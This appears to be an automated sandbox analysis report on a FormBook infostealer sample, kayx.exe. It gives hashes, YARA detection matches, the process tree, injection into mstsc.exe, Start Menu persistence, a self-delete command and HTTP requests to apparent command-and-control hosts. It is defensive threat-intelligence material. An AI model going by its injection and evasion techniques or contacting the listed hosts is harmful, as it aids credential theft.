
Analysis Report kayx.exe

Overview

General Information

Sample Name: kayx.exe
Analysis ID: 321226
MD5: a80e73a824b655491f54278b7a29467d
SHA1: f33ddffc223c9afa4e226d3567b990a8e44828e6
SHA256: bdcd13abdded8f4f709fb288fb78b4afff486854b3ea78ad378d11220a31c3c4
Tags: exe, Formbook

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • kayx.exe (PID: 6524 cmdline: 'C:\Users\user\Desktop\kayx.exe' MD5: A80E73A824B655491F54278B7A29467D)
    • kayx.exe (PID: 6932 cmdline: C:\Users\user\Desktop\kayx.exe MD5: A80E73A824B655491F54278B7A29467D)
    • kayx.exe (PID: 6916 cmdline: C:\Users\user\Desktop\kayx.exe MD5: A80E73A824B655491F54278B7A29467D)
    • kayx.exe (PID: 6900 cmdline: C:\Users\user\Desktop\kayx.exe MD5: A80E73A824B655491F54278B7A29467D)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • firefoxe.exe (PID: 3032 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe' MD5: A80E73A824B655491F54278B7A29467D)
        • firefoxe.exe (PID: 2128 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe' MD5: A80E73A824B655491F54278B7A29467D)
        • mstsc.exe (PID: 6072 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 2412003BE253A515C620CE4890F3D8F3)
          • cmd.exe (PID: 4816 cmdline: /c del 'C:\Users\user\Desktop\kayx.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x83c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x916a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9ee2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19157:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a1ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp; Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
    • 0x16079:$sqlite3step: 68 34 1C 7B E1
    • 0x1618c:$sqlite3step: 68 34 1C 7B E1
    • 0x160a8:$sqlite3text: 68 38 2A 90 C5
    • 0x161cd:$sqlite3text: 68 38 2A 90 C5
    • 0x160bb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x161e3:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x83c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x916a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9ee2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19157:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a1ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source: 17.2.kayx.exe.400000.0.unpack; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 17.2.kayx.exe.400000.0.unpack; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x75c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x7962:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x13275:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x12d61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x13377:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x134ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x836a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x11fdc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x90e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x18357:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x193ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 17.2.kayx.exe.400000.0.unpack; Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
    • 0x15279:$sqlite3step: 68 34 1C 7B E1
    • 0x1538c:$sqlite3step: 68 34 1C 7B E1
    • 0x152a8:$sqlite3text: 68 38 2A 90 C5
    • 0x153cd:$sqlite3text: 68 38 2A 90 C5
    • 0x152bb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x153e3:$sqlite3blob: 68 53 D8 7F 8C
Source: 17.1.kayx.exe.400000.0.unpack; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 17.1.kayx.exe.400000.0.unpack; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x75c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x7962:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x13275:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x12d61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x13377:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x134ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x836a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x11fdc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x90e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x18357:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x193ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Antivirus / Scanner detection for submitted sample
Source: kayx.exe; Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe; Avira: detection malicious, Label: TR/Dropper.MSIL.blecg
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe; ReversingLabs: Detection: 45%
Multi AV Scanner detection for submitted file
Source: kayx.exe; Virustotal: Detection: 34%
Source: kayx.exe; ReversingLabs: Detection: 45%
Yara detected FormBook
Source: Yara match; File source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe; Joe Sandbox ML: detected
Machine Learning detection for sample
Source: kayx.exe; Joe Sandbox ML: detected
Source: 17.2.kayx.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 17.1.kayx.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe; File opened: C:\Users\user\AppData\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe; File opened: C:\Users\user\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Users\user\Desktop\kayx.exe; Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\kayx.exe; Code function: 4x nop then pop edi
Source: global traffic; HTTP traffic detected: GET /bg8v/?dR-0T=Hsg8WmNsaLMOQIlEIMfuFbk4MqbSZJWeSLNd01xx1olwbrd2uyfvFyB8JS14b3uA3WpV&Fxl0dR=KdShEXiX HTTP/1.1; Host: www.ghoster.agency; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb1&Fxl0dR=KdShEXiX HTTP/1.1; Host: www.jibenentreprenad.mobi; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: Joe Sandbox View; IP Address: 184.168.131.241
Source: Joe Sandbox View; ASN Name: AS-26496-GO-DADDY-COM-LLCUS
Source: unknown; DNS traffic detected: queries for: www.ghoster.agency
Source: mstsc.exe, 00000015.00000002.487573696.000000000543D000.00000004.00000001.sdmp; String found in binary or memory: https://www.jiben.se/bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb
Source: firefoxe.exe, 00000013.00000002.483426018.000000000108B000.00000004.00000020.sdmp; Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match; File source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\kayx.exe; Code function: 1_2_05C4AAF0 NtUnmapViewOfSection,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 1_2_05C4AAE8 NtUnmapViewOfSection,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00417B90 NtCreateFile,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00417C40 NtReadFile,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00417CC0 NtClose,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00417D70 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00417B4A NtCreateFile,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00417BE2 NtCreateFile,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00417B8A NtCreateFile,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00417CBF NtClose,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E498F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E49860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E49840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E499A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E49910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E49A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E49A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E49A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E495D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E49540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E496E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E49660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E49FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E497A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E49780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E49710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E498A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E4B040 NtSuspendThread,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E49820 NtEnumerateKey,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E499D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E49950 NtQueueApcThread,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E49A80 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E49A10 NtQuerySection,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E4A3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E49B00 NtSetValueKey,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E495F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E49560 NtWriteFile,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E49520 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E4AD30 NtSetContextThread,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E496D0 NtCreateKey,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E49670 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E49650 NtQueryValueKey,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E49610 NtEnumerateValueKey,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E49760 NtOpenProcess,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E49770 NtSetInformationFile,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E4A770 NtOpenThread,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E49730 NtQueryVirtualMemory,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_2_00E4A710 NtOpenProcessToken,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_1_00417B90 NtCreateFile,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_1_00417C40 NtReadFile,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_1_00417CC0 NtClose,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_1_00417D70 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_1_00417B4A NtCreateFile,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_1_00417BE2 NtCreateFile,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_1_00417B8A NtCreateFile,
Source: C:\Users\user\Desktop\kayx.exe; Code function: 17_1_00417CBF NtClose,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_00402D90
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_0041BE80
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_0041BE8A
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_0041C6AB
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_0041C7F2
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_00402FB0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeCode function: 19_2_01060C1C
          Source: C:\Users\user\Desktop\kayx.exeCode function: String function: 00419A40 appears 38 times
          Source: C:\Users\user\Desktop\kayx.exeCode function: String function: 00E0B150 appears 54 times
Source: kayx.exe, 00000001.00000002.355661594.00000000059B0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs kayx.exe
Source: kayx.exe, 00000001.00000002.351671330.0000000000F28000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameVdltohs3.exel% vs kayx.exe
Source: kayx.exe, 00000001.00000002.352304174.000000000333A000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameClassLibrary3.dll< vs kayx.exe
Source: kayx.exe, 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameKlghppetippu.dll4 vs kayx.exe
Source: kayx.exe, 0000000F.00000002.349503948.0000000000268000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameVdltohs3.exel% vs kayx.exe
Source: kayx.exe, 00000010.00000002.350319835.0000000000328000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameVdltohs3.exel% vs kayx.exe
Source: kayx.exe, 00000011.00000002.397054523.000000000108F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs kayx.exe
Source: kayx.exe, 00000011.00000000.350990783.0000000000468000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameVdltohs3.exel% vs kayx.exe
Source: kayx.exe, 00000011.00000002.397835707.0000000002C23000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamemstsc.exej% vs kayx.exe
Source: kayx.exe | Binary or memory string: OriginalFilenameVdltohs3.exel% vs kayx.exe
Note: each entry compares the OriginalFilename field of a VS_VERSIONINFO resource found in memory with the name the sample was run under; the characters after the file name (T, l%, <, 4, j%) are the bytes that follow the string in the resource, not part of the name. Vdltohs3.exe is the name compiled into the sample's own version resource, so kayx.exe is a renamed build; it recurs in the image of every kayx.exe instance (process indices 01, 0F, 10 and 11). mscorrc.dll is the .NET runtime resource DLL mapped into process 01. ClassLibrary3.dll and Klghppetippu.dll sit in private read/write regions of process 01 (protection field 00000004, PAGE_READWRITE), i.e. assemblies present only in memory; the region at 0x41E1000 holding Klghppetippu.dll is the same dump the Yara scan flags as FormBook. ntdll.dll and mstsc.exe turn up in process 11 in regions with protection 00000040 (PAGE_EXECUTE_READWRITE), copies of those images held in private executable memory of the unpacked stage rather than the normally loaded modules, which fits the later injection into mstsc.exe.
Matched Yara rule Formbook_1: date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Matched Yara rule Formbook: author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Both rules matched each of the following sources:
Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY | Matched rules: Formbook_1, Formbook
Source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY | Matched rules: Formbook_1, Formbook
Source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rules: Formbook_1, Formbook
Source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY | Matched rules: Formbook_1, Formbook
Source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY | Matched rules: Formbook_1, Formbook
Source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rules: Formbook_1, Formbook
Source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY | Matched rules: Formbook_1, Formbook
Source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE | Matched rules: Formbook_1, Formbook
Source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE | Matched rules: Formbook_1, Formbook
Source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rules: Formbook_1, Formbook
Source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rules: Formbook_1, Formbook
